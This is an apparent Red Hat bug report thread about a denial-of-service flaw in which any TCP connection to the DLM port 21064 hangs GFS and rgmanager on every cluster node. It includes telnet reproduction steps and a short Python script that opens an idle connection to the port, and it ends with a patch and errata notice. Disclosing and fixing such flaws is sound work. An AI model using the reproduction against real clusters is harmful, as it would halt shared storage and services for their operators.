Opening a TCP connection from one cluster member to another, targeting the DLM port, is enough to stop every DLM operation in the cluster. This means that GFS and rgmanager will hang.

Steps to reproduce:
1. Telnet from one member of the cluster to another member of the cluster, targeting port 21064.
2. Try to write to a mounted GFS filesystem.

The write operation hangs, and every subsequent operation (read or write) on the GFS filesystem hangs on every node. Every service that uses DLM seems to stop working. Rgmanager stops working with an "Unable to obtain cluster lock: Connection timed out" error message.

Even a zero-data connection, such as a TCP port scan, is enough to stop DLM operations on the whole cluster.
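For anyone who wants to script the reproduction instead of using telnet, here is a minimal sketch in Python. It only does what the report describes: it opens a TCP connection to the DLM port, sends no data, holds the socket open for a while, and closes it. The function name open_idle_connection and its parameters are hypothetical and not part of any cluster tooling; the port number 21064 is the one given in the report.

```python
import socket
import time

DLM_PORT = 21064  # DLM port as given in the report


def open_idle_connection(host, port=DLM_PORT, hold_seconds=5.0, timeout=3.0):
    """Open a TCP connection to host:port, send nothing, then close it.

    Returns True if the connection was established, False otherwise.
    Hypothetical helper for illustration only.
    """
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        # Connection refused, timed out, or host unreachable.
        return False
    try:
        # Zero-data connection: keep the socket open without writing to it.
        time.sleep(hold_seconds)
    finally:
        sock.close()
    return True


# Example (run from one cluster member against another; "node2" is a placeholder):
#   open_idle_connection("node2")
# then try a write on a mounted GFS filesystem from any node.
```

This should only be run against a test cluster, since on an affected kernel the report indicates it can stall GFS and rgmanager on every node.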
This request was evaluated by Red Hat Product Management for inclusion in a Red Hat Enterprise Linux maintenance release. Product Management has requested further review of this request by Red Hat Engineering, for potential inclusion in a Red Hat Enterprise Linux Update release for currently deployed products. This request is not yet committed for inclusion in an Update release.
Why are we wasting our time with this BZ?

*** This bug has been marked as a duplicate of 245892 ***
OK, patch posted to you and rhkernel-list.
A patch for this issue has been included in build 2.6.18-8.1.15.
An advisory has been issued which should help the problem described in this bug report. This report is therefore being closed with a resolution of ERRATA. For more information on the solution and/or where to find the updated files, please follow the link below. You may reopen this bug report if the solution does not work for you. http://rhn.redhat.com/errata/RHSA-2007-0940.html